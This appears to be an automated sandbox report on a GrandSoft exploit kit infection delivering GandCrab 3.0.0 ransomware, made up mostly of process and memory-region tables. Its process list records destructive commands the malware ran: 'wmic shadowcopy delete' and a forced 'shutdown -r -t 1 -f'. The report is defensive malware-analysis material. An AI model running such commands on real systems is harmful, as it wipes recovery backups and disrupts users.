GrandSoft Exploit Kit delivers GandCrab 3.0.0 Ransomware

Monitored Processes

Process Overview

ID	PID	Monitor Reason	Integrity Level	Image Name	Command Line	Origin ID
#1	0x890	Analysis Target	Medium	iexplore.exe	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" about:blank	-
#2	0x8d4	Child Process	Medium	iexplore.exe	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2192 CREDAT:14337	#1
#5	0x9dc	Child Process	Medium	cmd.exe	cmd.exe /c start C:\Users\5P5NRG~1\AppData\Local\Temp\czar.exe	#2
#6	0xa38	Child Process	Medium	czar.exe	C:\Users\5P5NRG~1\AppData\Local\Temp\czar.exe	#5
#7	0xa88	Child Process	System (Elevated)	svchost.exe	C:\Windows\SysWOW64\svchost.exe	#6
#9	0xb78	Child Process	System (Elevated)	wmic.exe	"C:\Windows\system32\wbem\wmic.exe" shadowcopy delete	#7
#10	0xb90	Child Process	System (Elevated)	cmd.exe	"C:\Windows\System32\cmd.exe" /c shutdown -r -t 1 -f	#7
#11	0xbb8	Child Process	System (Elevated)	shutdown.exe	shutdown -r -t 1 -f	#10

Behavior Information - Grouped by Category

Process #1: iexplore.exe

Information	Value
ID	#1
File Name	c:\program files (x86)\internet explorer\iexplore.exe
Command Line	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" about:blank
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:16, Reason: Analysis Target
Unmonitor	End Time: 00:10:27, Reason: Terminated by Timeout
Monitor Duration	00:10:11
Remarks	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0x890
Parent PID	0x564 (c:\windows\explorer.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 914 0x 910 0x 8CC 0x 8C8 0x 8C4 0x 8C0 0x 8BC 0x 8B8 0x 8B4 0x 8B0 0x 8AC 0x 8A8 0x 8A4 0x 8A0 0x 89C 0x 898 0x 894 0x 0 0x 970 0x 974 0x 9FC

Region

Name	Start VA	End VA	Type	Permissions	Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x0000000000020000	0x00020000	0x00026fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000000000030000	0x00030000	0x00031fff	Pagefile Backed Memory	Readable, Writable	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	-
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	Readable	-
locale.nls	0x00060000	0x000c6fff	Memory Mapped File	Readable	-
iexplore.exe.mui	0x000d0000	0x000d1fff	Memory Mapped File	Readable, Writable	-
private_0x00000000000e0000	0x000e0000	0x000e0fff	Private Memory	Readable, Writable	-
private_0x00000000000f0000	0x000f0000	0x000f0fff	Private Memory	Readable, Writable	-
oleaccrc.dll	0x00100000	0x00100fff	Memory Mapped File	Readable	-
pagefile_0x0000000000110000	0x00110000	0x00111fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000000000120000	0x00120000	0x00121fff	Pagefile Backed Memory	Readable	-
private_0x0000000000130000	0x00130000	0x0016ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000000170000	0x00170000	0x00171fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000000000180000	0x00180000	0x00180fff	Pagefile Backed Memory	Readable, Writable	-
index.dat	0x00190000	0x0019ffff	Memory Mapped File	Readable, Writable	-
index.dat	0x001a0000	0x001a7fff	Memory Mapped File	Readable, Writable	-
index.dat	0x001b0000	0x001bffff	Memory Mapped File	Readable, Writable	-
pagefile_0x00000000001c0000	0x001c0000	0x001c0fff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x00000000001d0000	0x001d0000	0x001d0fff	Pagefile Backed Memory	Readable	-
private_0x00000000001e0000	0x001e0000	0x001e0fff	Private Memory	Readable, Writable	-
private_0x00000000001f0000	0x001f0000	0x001f0fff	Private Memory	Readable, Writable	-
pagefile_0x0000000000200000	0x00200000	0x00200fff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x0000000000210000	0x00210000	0x00210fff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x0000000000220000	0x00220000	0x00221fff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x0000000000230000	0x00230000	0x00231fff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x0000000000240000	0x00240000	0x00241fff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000000000250000	0x00250000	0x0034ffff	Private Memory	Readable, Writable	-
private_0x0000000000350000	0x00350000	0x0044ffff	Private Memory	Readable, Writable	-
private_0x0000000000450000	0x00450000	0x0045ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000000460000	0x00460000	0x00460fff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x0000000000470000	0x00470000	0x00471fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000000000480000	0x00480000	0x00480fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000000000490000	0x00490000	0x00490fff	Pagefile Backed Memory	Readable	-
private_0x00000000004a0000	0x004a0000	0x004dffff	Private Memory	Readable, Writable	-
private_0x00000000004e0000	0x004e0000	0x004fffff	Private Memory	Readable, Writable	-
private_0x0000000000500000	0x00500000	0x0053ffff	Private Memory	Readable, Writable	-
private_0x0000000000540000	0x00540000	0x005bffff	Private Memory	Readable, Writable	-
pagefile_0x00000000005c0000	0x005c0000	0x00747fff	Pagefile Backed Memory	Readable	-
private_0x0000000000750000	0x00750000	0x00751fff	Private Memory	Readable, Writable, Executable	-
private_0x0000000000760000	0x00760000	0x0079ffff	Private Memory	Readable, Writable	-
pagefile_0x00000000007a0000	0x007a0000	0x007a0fff	Pagefile Backed Memory	Readable, Writable	-
private_0x00000000007b0000	0x007b0000	0x007b0fff	Private Memory	Readable, Writable	-
private_0x00000000007c0000	0x007c0000	0x007fffff	Private Memory	Readable, Writable	-
private_0x0000000000800000	0x00800000	0x00802fff	Private Memory	Readable, Writable	-
private_0x0000000000810000	0x00810000	0x00812fff	Private Memory	Readable, Writable	-
private_0x0000000000820000	0x00820000	0x0085ffff	Private Memory	Readable, Writable	-
iexplore.exe	0x00860000	0x00905fff	Memory Mapped File	Readable, Writable, Executable	-
pagefile_0x0000000000910000	0x00910000	0x00a90fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000000000aa0000	0x00aa0000	0x00afcfff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000000000b00000	0x00b00000	0x00bfffff	Private Memory	Readable, Writable	-
pagefile_0x0000000000c00000	0x00c00000	0x01ffffff	Pagefile Backed Memory	Readable	-
sortdefault.nls	0x02000000	0x022cefff	Memory Mapped File	Readable	-
private_0x00000000022d0000	0x022d0000	0x022d0fff	Private Memory	Readable, Writable	-
private_0x00000000022e0000	0x022e0000	0x022e2fff	Private Memory	Readable, Writable	-
private_0x00000000022f0000	0x022f0000	0x022f2fff	Private Memory	Readable, Writable	-
private_0x0000000002300000	0x02300000	0x0233ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000002340000	0x02340000	0x023adfff	Pagefile Backed Memory	Readable, Writable	-
private_0x00000000023b0000	0x023b0000	0x023b0fff	Private Memory	Readable, Writable	-
private_0x00000000023c0000	0x023c0000	0x023fffff	Private Memory	Readable, Writable	-
private_0x0000000002400000	0x02400000	0x0243ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000002440000	0x02440000	0x0251efff	Pagefile Backed Memory	Readable	-
private_0x0000000002520000	0x02520000	0x02520fff	Private Memory	Readable, Writable	-
private_0x0000000002530000	0x02530000	0x0256ffff	Private Memory	Readable, Writable	-
private_0x0000000002570000	0x02570000	0x02581fff	Private Memory	Readable, Writable	-
pagefile_0x0000000002590000	0x02590000	0x02590fff	Pagefile Backed Memory	Readable, Writable	-
private_0x00000000025a0000	0x025a0000	0x0269ffff	Private Memory	Readable, Writable	-
pagefile_0x00000000026a0000	0x026a0000	0x02717fff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000000002720000	0x02720000	0x02720fff	Private Memory	Readable, Writable	-
private_0x0000000002730000	0x02730000	0x02730fff	Private Memory	Readable, Writable	-
private_0x0000000002740000	0x02740000	0x02743fff	Private Memory	Readable, Writable	-
private_0x0000000002750000	0x02750000	0x0284ffff	Private Memory	Readable, Writable	-
private_0x0000000002850000	0x02850000	0x02851fff	Private Memory	Readable, Writable	-
private_0x0000000002860000	0x02860000	0x02860fff	Private Memory	Readable, Writable	-
private_0x0000000002870000	0x02870000	0x02870fff	Private Memory	Readable, Writable	-
private_0x0000000002880000	0x02880000	0x028bffff	Private Memory	Readable, Writable	-
private_0x00000000028c0000	0x028c0000	0x0293ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000002940000	0x02940000	0x02940fff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000000002950000	0x02950000	0x0295dfff	Private Memory	Readable, Writable	-
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db	0x02960000	0x0297efff	Memory Mapped File	Readable	-
private_0x0000000002980000	0x02980000	0x02980fff	Private Memory	Readable, Writable	-
private_0x0000000002990000	0x02990000	0x02a8ffff	Private Memory	Readable, Writable	-
private_0x0000000002a90000	0x02a90000	0x02a90fff	Private Memory	Readable, Writable	-
private_0x0000000002aa0000	0x02aa0000	0x02aa0fff	Private Memory	Readable, Writable	-
private_0x0000000002ab0000	0x02ab0000	0x02ab0fff	Private Memory	Readable, Writable	-
private_0x0000000002ac0000	0x02ac0000	0x02ac0fff	Private Memory	Readable, Writable	-
private_0x0000000002ad0000	0x02ad0000	0x02ad0fff	Private Memory	Readable, Writable	-
private_0x0000000002ae0000	0x02ae0000	0x02bdffff	Private Memory	Readable, Writable	-
private_0x0000000002be0000	0x02be0000	0x02be0fff	Private Memory	Readable, Writable	-
private_0x0000000002bf0000	0x02bf0000	0x02bf0fff	Private Memory	Readable, Writable	-
private_0x0000000002c00000	0x02c00000	0x02c00fff	Private Memory	Readable, Writable	-
private_0x0000000002c10000	0x02c10000	0x02c4ffff	Private Memory	Readable, Writable	-
private_0x0000000002c50000	0x02c50000	0x02c50fff	Private Memory	Readable, Writable	-
private_0x0000000002c60000	0x02c60000	0x02c9ffff	Private Memory	Readable, Writable	-
private_0x0000000002ca0000	0x02ca0000	0x02ca0fff	Private Memory	Readable, Writable	-
private_0x0000000002cb0000	0x02cb0000	0x02cb0fff	Private Memory	Readable, Writable	-
private_0x0000000002cc0000	0x02cc0000	0x02cc0fff	Private Memory	Readable, Writable	-
private_0x0000000002cd0000	0x02cd0000	0x02cd0fff	Private Memory	Readable, Writable	-
private_0x0000000002ce0000	0x02ce0000	0x02ce0fff	Private Memory	Readable, Writable	-
private_0x0000000002cf0000	0x02cf0000	0x02deffff	Private Memory	Readable, Writable	-
private_0x0000000002df0000	0x02df0000	0x02df0fff	Private Memory	Readable, Writable	-
private_0x0000000002e00000	0x02e00000	0x02e00fff	Private Memory	Readable, Writable	-
private_0x0000000002e10000	0x02e10000	0x02e10fff	Private Memory	Readable, Writable	-
private_0x0000000002e20000	0x02e20000	0x02e20fff	Private Memory	Readable, Writable	-
private_0x0000000002e30000	0x02e30000	0x02e30fff	Private Memory	Readable, Writable	-
private_0x0000000002e40000	0x02e40000	0x02e40fff	Private Memory	Readable, Writable	-
private_0x0000000002e50000	0x02e50000	0x02e8ffff	Private Memory	Readable, Writable	-
private_0x0000000002e90000	0x02e90000	0x02e90fff	Private Memory	Readable, Writable	-
private_0x0000000002ea0000	0x02ea0000	0x02edffff	Private Memory	Readable, Writable	-
private_0x0000000002ee0000	0x02ee0000	0x02fdffff	Private Memory	Readable, Writable	-
private_0x0000000002fe0000	0x02fe0000	0x02fe0fff	Private Memory	Readable, Writable	-
private_0x0000000002ff0000	0x02ff0000	0x02ff0fff	Private Memory	Readable, Writable	-
private_0x0000000003000000	0x03000000	0x03000fff	Private Memory	Readable, Writable	-
private_0x0000000003010000	0x03010000	0x03010fff	Private Memory	Readable, Writable	-
private_0x0000000003020000	0x03020000	0x03020fff	Private Memory	Readable, Writable	-
private_0x0000000003030000	0x03030000	0x03030fff	Private Memory	Readable, Writable	-
private_0x0000000003040000	0x03040000	0x03040fff	Private Memory	Readable, Writable	-
private_0x0000000003050000	0x03050000	0x03050fff	Private Memory	Readable, Writable	-
private_0x0000000003060000	0x03060000	0x03060fff	Private Memory	Readable, Writable	-
private_0x0000000003070000	0x03070000	0x030affff	Private Memory	Readable, Writable	-
private_0x00000000030b0000	0x030b0000	0x030b0fff	Private Memory	Readable, Writable	-
private_0x00000000030c0000	0x030c0000	0x030c0fff	Private Memory	Readable, Writable	-
private_0x00000000030d0000	0x030d0000	0x0310ffff	Private Memory	Readable, Writable	-
private_0x0000000003110000	0x03110000	0x03110fff	Private Memory	Readable, Writable	-
private_0x0000000003120000	0x03120000	0x0312ffff	Private Memory	Readable, Writable	-
private_0x0000000003130000	0x03130000	0x03132fff	Private Memory	Readable, Writable	-
private_0x0000000003140000	0x03140000	0x0314ffff	Private Memory	Readable, Writable	-
private_0x0000000003150000	0x03150000	0x03150fff	Private Memory	Readable, Writable	-
private_0x0000000003160000	0x03160000	0x0325ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000003260000	0x03260000	0x03261fff	Pagefile Backed Memory	Readable	-
msctf.dll.mui	0x03270000	0x03270fff	Memory Mapped File	Readable, Writable	-
pagefile_0x0000000003280000	0x03280000	0x03280fff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000000003290000	0x03290000	0x0338ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000003390000	0x03390000	0x03390fff	Pagefile Backed Memory	Readable, Writable	-
private_0x00000000033a0000	0x033a0000	0x0349ffff	Private Memory	Readable, Writable	-
private_0x00000000034a0000	0x034a0000	0x034bffff	Private Memory	Readable, Writable	-
private_0x00000000034c0000	0x034c0000	0x034cdfff	Private Memory	Readable, Writable	-
private_0x00000000034d0000	0x034d0000	0x034d0fff	Private Memory	Readable, Writable	-
private_0x00000000034e0000	0x034e0000	0x034e0fff	Private Memory	Readable, Writable	-
private_0x00000000034f0000	0x034f0000	0x0352ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000003530000	0x03530000	0x035b5fff	Pagefile Backed Memory	Readable, Writable	-
private_0x00000000035c0000	0x035c0000	0x035c0fff	Private Memory	Readable, Writable	-
private_0x00000000035d0000	0x035d0000	0x035d0fff	Private Memory	Readable, Writable	-
private_0x00000000035e0000	0x035e0000	0x035e5fff	Private Memory	Readable, Writable	-
cversions.2.db	0x035f0000	0x035f3fff	Memory Mapped File	Readable	-
private_0x0000000003600000	0x03600000	0x03600fff	Private Memory	Readable, Writable	-
private_0x0000000003610000	0x03610000	0x0370ffff	Private Memory	Readable, Writable	-
private_0x0000000003710000	0x03710000	0x03724fff	Private Memory	Readable, Writable	-
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db	0x03730000	0x0375ffff	Memory Mapped File	Readable	-
cversions.2.db	0x03760000	0x03763fff	Memory Mapped File	Readable	-
For performance reasons, the remaining 194 entries are omitted. The remaining entries can be found in flog.txt.

Process #2: iexplore.exe

493

Information	Value
ID	#2
File Name	c:\program files (x86)\internet explorer\iexplore.exe
Command Line	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2192 CREDAT:14337
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor	Start Time: 00:00:16, Reason: Child Process
Unmonitor	End Time: 00:10:27, Reason: Terminated by Timeout
Monitor Duration	00:10:11

OS Process Information

Information	Value
PID	0x8d4
Parent PID	0x890 (c:\program files (x86)\internet explorer\iexplore.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 90C 0x 908 0x 904 0x 900 0x 8FC 0x 8F8 0x 8F4 0x 8F0 0x 8EC 0x 8E8 0x 8E4 0x 8E0 0x 8DC 0x 8D8 0x 92C 0x 930 0x 934 0x 938 0x 93C 0x 964 0x 978 0x 97C 0x 980 0x 99C 0x 0 0x 9F8

Region

Name	Start VA	End VA	Type	Permissions	Actions
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x0000000000020000	0x00020000	0x00026fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000000000030000	0x00030000	0x00031fff	Pagefile Backed Memory	Readable, Writable	-
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	-
pagefile_0x0000000000050000	0x00050000	0x00053fff	Pagefile Backed Memory	Readable	-
iexplore.exe.mui	0x00060000	0x00061fff	Memory Mapped File	Readable, Writable	-
private_0x0000000000070000	0x00070000	0x00070fff	Private Memory	Readable, Writable	-
private_0x0000000000080000	0x00080000	0x000fffff	Private Memory	Readable, Writable	-
locale.nls	0x00100000	0x00166fff	Memory Mapped File	Readable	-
private_0x0000000000170000	0x00170000	0x00170fff	Private Memory	Readable, Writable	-
oleaccrc.dll	0x00180000	0x00180fff	Memory Mapped File	Readable	-
pagefile_0x0000000000190000	0x00190000	0x00191fff	Pagefile Backed Memory	Readable	-
pagefile_0x00000000001a0000	0x001a0000	0x001a0fff	Pagefile Backed Memory	Readable	-
pagefile_0x00000000001b0000	0x001b0000	0x001b1fff	Pagefile Backed Memory	Readable	-
private_0x00000000001c0000	0x001c0000	0x001c0fff	Private Memory	Readable, Writable	-
pagefile_0x00000000001d0000	0x001d0000	0x001d0fff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x00000000001e0000	0x001e0000	0x001e1fff	Pagefile Backed Memory	Readable	-
private_0x00000000001f0000	0x001f0000	0x001f0fff	Private Memory	Readable, Writable	-
pagefile_0x0000000000200000	0x00200000	0x00201fff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000000000210000	0x00210000	0x0024ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000000250000	0x00250000	0x002bdfff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x00000000002c0000	0x002c0000	0x002c1fff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x00000000002d0000	0x002d0000	0x002d1fff	Pagefile Backed Memory	Readable, Writable	-
private_0x00000000002e0000	0x002e0000	0x003dffff	Private Memory	Readable, Writable	-
pagefile_0x00000000003e0000	0x003e0000	0x003e0fff	Pagefile Backed Memory	Readable	-
pagefile_0x00000000003f0000	0x003f0000	0x003f0fff	Pagefile Backed Memory	Readable	-
private_0x0000000000400000	0x00400000	0x004fffff	Private Memory	Readable, Writable	-
pagefile_0x0000000000500000	0x00500000	0x005defff	Pagefile Backed Memory	Readable	-
private_0x00000000005e0000	0x005e0000	0x0061ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000000620000	0x00620000	0x00620fff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x0000000000630000	0x00630000	0x00630fff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000000000640000	0x00640000	0x0064ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000000650000	0x00650000	0x007d7fff	Pagefile Backed Memory	Readable	-
pagefile_0x00000000007e0000	0x007e0000	0x00857fff	Pagefile Backed Memory	Readable, Writable	-
iexplore.exe	0x00860000	0x00905fff	Memory Mapped File	Readable, Writable, Executable	-
pagefile_0x0000000000910000	0x00910000	0x00a90fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000000000aa0000	0x00aa0000	0x01e9ffff	Pagefile Backed Memory	Readable	-
sortdefault.nls	0x01ea0000	0x0216efff	Memory Mapped File	Readable	-
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000016.db	0x02170000	0x0218efff	Memory Mapped File	Readable	-
private_0x0000000002190000	0x02190000	0x02191fff	Private Memory	Readable, Writable, Executable	-
pagefile_0x00000000021a0000	0x021a0000	0x021a1fff	Pagefile Backed Memory	Readable	-
index.dat	0x021b0000	0x021bffff	Memory Mapped File	Readable, Writable	-
index.dat	0x021c0000	0x021c7fff	Memory Mapped File	Readable, Writable	-
index.dat	0x021d0000	0x021dffff	Memory Mapped File	Readable, Writable	-
pagefile_0x00000000021e0000	0x021e0000	0x021e0fff	Pagefile Backed Memory	Readable, Writable	-
private_0x00000000021f0000	0x021f0000	0x0220ffff	Private Memory	Readable, Writable	-
private_0x0000000002210000	0x02210000	0x0230ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000002310000	0x02310000	0x02310fff	Pagefile Backed Memory	Readable	-
private_0x0000000002320000	0x02320000	0x02321fff	Private Memory	Readable, Writable	-
private_0x0000000002330000	0x02330000	0x0236ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000002370000	0x02370000	0x02370fff	Pagefile Backed Memory	Readable	-
pagefile_0x0000000002380000	0x02380000	0x02382fff	Pagefile Backed Memory	Readable	-
private_0x0000000002390000	0x02390000	0x02393fff	Private Memory	Readable, Writable	-
private_0x00000000023a0000	0x023a0000	0x023b7fff	Private Memory	Readable, Writable	-
private_0x00000000023c0000	0x023c0000	0x023fffff	Private Memory	Readable, Writable	-
private_0x0000000002400000	0x02400000	0x0240ffff	Private Memory	Readable, Writable	-
private_0x0000000002410000	0x02410000	0x02410fff	Private Memory	Readable, Writable	-
private_0x0000000002420000	0x02420000	0x0245ffff	Private Memory	Readable, Writable	-
private_0x0000000002460000	0x02460000	0x0246ffff	Private Memory	-	-
private_0x0000000002470000	0x02470000	0x0247ffff	Private Memory	Readable, Writable	-
private_0x0000000002480000	0x02480000	0x0248ffff	Private Memory	Readable, Writable	-
private_0x0000000002490000	0x02490000	0x0249ffff	Private Memory	Readable, Writable	-
private_0x00000000024a0000	0x024a0000	0x0259ffff	Private Memory	Readable, Writable	-
private_0x00000000025a0000	0x025a0000	0x025dffff	Private Memory	Readable, Writable	-
private_0x00000000025e0000	0x025e0000	0x026dffff	Private Memory	Readable, Writable	-
private_0x00000000026e0000	0x026e0000	0x0271ffff	Private Memory	Readable, Writable	-
private_0x0000000002720000	0x02720000	0x0272ffff	Private Memory	Readable, Writable	-
private_0x0000000002730000	0x02730000	0x0273ffff	Private Memory	Readable, Writable	-
private_0x0000000002740000	0x02740000	0x0277ffff	Private Memory	Readable, Writable	-
private_0x0000000002780000	0x02780000	0x0278ffff	Private Memory	Readable, Writable	-
private_0x0000000002790000	0x02790000	0x0279ffff	Private Memory	Readable, Writable	-
private_0x00000000027a0000	0x027a0000	0x027affff	Private Memory	Readable, Writable	-
private_0x00000000027b0000	0x027b0000	0x027bffff	Private Memory	Readable, Writable	-
pagefile_0x00000000027c0000	0x027c0000	0x027c0fff	Pagefile Backed Memory	Readable, Writable	-
private_0x00000000027d0000	0x027d0000	0x0280ffff	Private Memory	Readable, Writable	-
private_0x0000000002810000	0x02810000	0x0290ffff	Private Memory	Readable, Writable	-
private_0x0000000002910000	0x02910000	0x02910fff	Private Memory	Readable, Writable, Executable	-
pagefile_0x0000000002920000	0x02920000	0x02920fff	Pagefile Backed Memory	Readable, Writable	-
private_0x0000000002930000	0x02930000	0x0296ffff	Private Memory	Readable, Writable	-
private_0x0000000002970000	0x02970000	0x0297ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000002980000	0x02980000	0x02980fff	Pagefile Backed Memory	Readable	-
private_0x0000000002990000	0x02990000	0x02a8ffff	Private Memory	Readable, Writable	-
private_0x0000000002a90000	0x02a90000	0x02c8ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000002c90000	0x02c90000	0x02c92fff	Pagefile Backed Memory	Readable	-
private_0x0000000002ca0000	0x02ca0000	0x02caffff	Private Memory	Readable, Writable	-
private_0x0000000002cb0000	0x02cb0000	0x02cb3fff	Private Memory	Readable, Writable	-
private_0x0000000002cc0000	0x02cc0000	0x02cd7fff	Private Memory	Readable, Writable	-
private_0x0000000002ce0000	0x02ce0000	0x02ceffff	Private Memory	Readable, Writable	-
private_0x0000000002cf0000	0x02cf0000	0x02cf0fff	Private Memory	Readable, Writable	-
private_0x0000000002d00000	0x02d00000	0x02d0ffff	Private Memory	-	-
private_0x0000000002d10000	0x02d10000	0x02e0ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000002e10000	0x02e10000	0x03202fff	Pagefile Backed Memory	Readable	-
private_0x0000000003210000	0x03210000	0x0321ffff	Private Memory	Readable, Writable	-
private_0x0000000003220000	0x03220000	0x0322ffff	Private Memory	Readable, Writable	-
private_0x0000000003230000	0x03230000	0x0323ffff	Private Memory	Readable, Writable	-
private_0x0000000003240000	0x03240000	0x0324ffff	Private Memory	Readable, Writable	-
private_0x0000000003250000	0x03250000	0x0328ffff	Private Memory	Readable, Writable	-
private_0x0000000003290000	0x03290000	0x0329ffff	Private Memory	Readable, Writable	-
index.dat	0x032a0000	0x032a7fff	Memory Mapped File	Readable, Writable	-
acroiehelper.dll	0x032b0000	0x032bcfff	Memory Mapped File	Readable	-
private_0x00000000032c0000	0x032c0000	0x032fffff	Private Memory	Readable, Writable	-
private_0x0000000003300000	0x03300000	0x03300fff	Private Memory	Readable, Writable	-
private_0x0000000003310000	0x03310000	0x0334ffff	Private Memory	Readable, Writable	-
ieframe.dll	0x03350000	0x03361fff	Memory Mapped File	Readable	-
private_0x0000000003370000	0x03370000	0x03370fff	Private Memory	Readable, Writable	-
private_0x0000000003380000	0x03380000	0x03380fff	Private Memory	Readable, Writable	-
pagefile_0x0000000003390000	0x03390000	0x03390fff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x00000000033a0000	0x033a0000	0x033a0fff	Pagefile Backed Memory	Readable, Writable	-
pagefile_0x00000000033b0000	0x033b0000	0x033b0fff	Pagefile Backed Memory	Readable, Writable	-
private_0x00000000033c0000	0x033c0000	0x033c0fff	Private Memory	Readable, Writable	-
private_0x00000000033d0000	0x033d0000	0x033dffff	Private Memory	Readable, Writable	-
pagefile_0x00000000033e0000	0x033e0000	0x033e1fff	Pagefile Backed Memory	Readable	-
mlang.dll.mui	0x033f0000	0x033f3fff	Memory Mapped File	Readable, Writable	-
private_0x0000000003400000	0x03400000	0x03401fff	Private Memory	Readable, Writable	-
private_0x0000000003410000	0x03410000	0x0344ffff	Private Memory	Readable, Writable	-
private_0x0000000003450000	0x03450000	0x0354ffff	Private Memory	Readable, Writable	-
private_0x0000000003550000	0x03550000	0x035cffff	Private Memory	Readable, Writable	-
private_0x00000000035d0000	0x035d0000	0x036cffff	Private Memory	Readable, Writable	-
private_0x00000000036d0000	0x036d0000	0x037cffff	Private Memory	Readable, Writable	-
pagefile_0x00000000037d0000	0x037d0000	0x037d0fff	Pagefile Backed Memory	Readable, Writable	-
msctf.dll.mui	0x037e0000	0x037e0fff	Memory Mapped File	Readable, Writable	-
private_0x0000000003810000	0x03810000	0x0384ffff	Private Memory	Readable, Writable, Executable	-
private_0x0000000003870000	0x03870000	0x038affff	Private Memory	Readable, Writable	-
staticcache.dat	0x038b0000	0x041dffff	Memory Mapped File	Readable	-
private_0x0000000004290000	0x04290000	0x042cffff	Private Memory	Readable, Writable	-
private_0x0000000004390000	0x04390000	0x0439ffff	Private Memory	Readable, Writable	-
private_0x00000000043d0000	0x043d0000	0x044cffff	Private Memory	Readable, Writable	-
private_0x0000000004530000	0x04530000	0x0456ffff	Private Memory	Readable, Writable	-
private_0x0000000004570000	0x04570000	0x045affff	Private Memory	Readable, Writable	-
private_0x0000000004630000	0x04630000	0x0472ffff	Private Memory	Readable, Writable	-
private_0x00000000047b0000	0x047b0000	0x048affff	Private Memory	Readable, Writable	-
private_0x00000000048b0000	0x048b0000	0x049affff	Private Memory	Readable, Writable	-
private_0x00000000049f0000	0x049f0000	0x049fffff	Private Memory	Readable, Writable	-
private_0x0000000004b90000	0x04b90000	0x04b9ffff	Private Memory	Readable, Writable	-
private_0x0000000004d80000	0x04d80000	0x04d8ffff	Private Memory	Readable, Writable	-
pagefile_0x0000000004d90000	0x04d90000	0x050d2fff	Pagefile Backed Memory	Readable	-
private_0x000000005fff0000	0x5fff0000	0x5fffffff	Private Memory	Readable, Writable, Executable	-
office.odf	0x71e80000	0x72299fff	Memory Mapped File	Readable, Writable, Executable	-
grooveintlresource.dll	0x722a0000	0x72b04fff	Memory Mapped File	Readable, Writable, Executable	-
grooveex.dll	0x72b10000	0x72f18fff	Memory Mapped File	Readable, Writable, Executable	-
sxs.dll	0x73000000	0x7305efff	Memory Mapped File	Readable, Writable, Executable	-
msvcr100.dll	0x73060000	0x7311efff	Memory Mapped File	Readable, Writable, Executable	-
jp2ssv.dll	0x73120000	0x7314dfff	Memory Mapped File	Readable, Writable, Executable	-
msohev.dll	0x73150000	0x73163fff	Memory Mapped File	Readable, Writable, Executable	-
urlredir.dll	0x73170000	0x73200fff	Memory Mapped File	Readable, Writable, Executable	-
ssv.dll	0x73210000	0x73283fff	Memory Mapped File	Readable, Writable, Executable	-
msftedit.dll	0x73290000	0x73323fff	Memory Mapped File	Readable, Writable, Executable	-
mshtml.dll	0x73330000	0x738e6fff	Memory Mapped File	Readable, Writable, Executable	-
ieframe.dll	0x738f0000	0x7436ffff	Memory Mapped File	Readable, Writable, Executable	-
comctl32.dll	0x74390000	0x74413fff	Memory Mapped File	Readable, Writable, Executable	-
For performance reasons, the remaining 194 entries are omitted. The remaining entries can be found in flog.txt.

Host Behavior

COM (13)

Operation	Class	Interface	Additional Information	Count	Logfile
Create	6C736DB1-BD94-11D0-8A23-00AA00B58E10	6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	WBEMLocator	IWbemLocator	cls_context = CLSCTX_INPROC_SERVER	1	Fn
